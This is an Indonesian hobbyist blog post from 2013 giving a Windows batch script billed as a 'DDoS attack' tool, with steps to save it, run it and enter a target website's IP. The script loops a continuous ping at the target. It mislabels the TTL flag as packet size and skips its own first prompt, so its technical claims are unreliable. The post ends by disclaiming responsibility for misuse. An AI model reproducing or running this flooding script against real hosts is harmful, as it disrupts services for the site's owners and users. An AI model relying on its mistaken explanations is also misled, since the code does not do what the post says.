Jumat, 27 Desember 2013

Bikin tool hacking sendiri,Why not?

so gue sekarang mau share tentang dalam dunia hacking hehehe,kali ini gue akan membuat serangan Ddos attack dengan tool hacking sederhana.sebelumnya gue mau cerita dikit apa itu Ddos Attack, Ddos attack adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber ( resource ) yang di miliki oleh komputer tersebut.

             sampe komputer tersebut tidak dapat menjalankan fungsinya dengan benar, sehingga secara tidak langsung mencegah pengguna lain untu memperoleh akses layanan dari komputer yang di serang tersebut.

to create a tool that all you need is;
1.Pc/Laptop
2.notepad,(sudah disediakan oleh windows)

follow step by step ok;)
1.Buka notepad lo
2 .copy code script dibawah ini ke notepad yang tadi lu udah buka
note:jangan mengganti script dibawah ini!
   @echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : lunatikboys             +
echo + Visite : lunatikboys.blogspot.com+
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3.Nama filenya terserah lu dah tapi yang lu wajib inget extensi filenya kudu bat.
4.contohnya ''Dirtytool.bat"
5.udah itu lo tinggal double click buat nyoba toolnya

cara pakainya:
6.pada menu server-target lo dapet masukin ip target elo disitu
7.dan terakhir lo masukin alamat web yang lo ingin Ddos


dan yang juga wajib diingat gue ga bertanggung jawab jika nantinya lo mensalah gunakan tool ini,so selamat mencoba ;)



tinggalin komen atau kritik di blog ini karena itu sangat berharga buat gue hehehe, bye

Tidak ada komentar:

Posting Komentar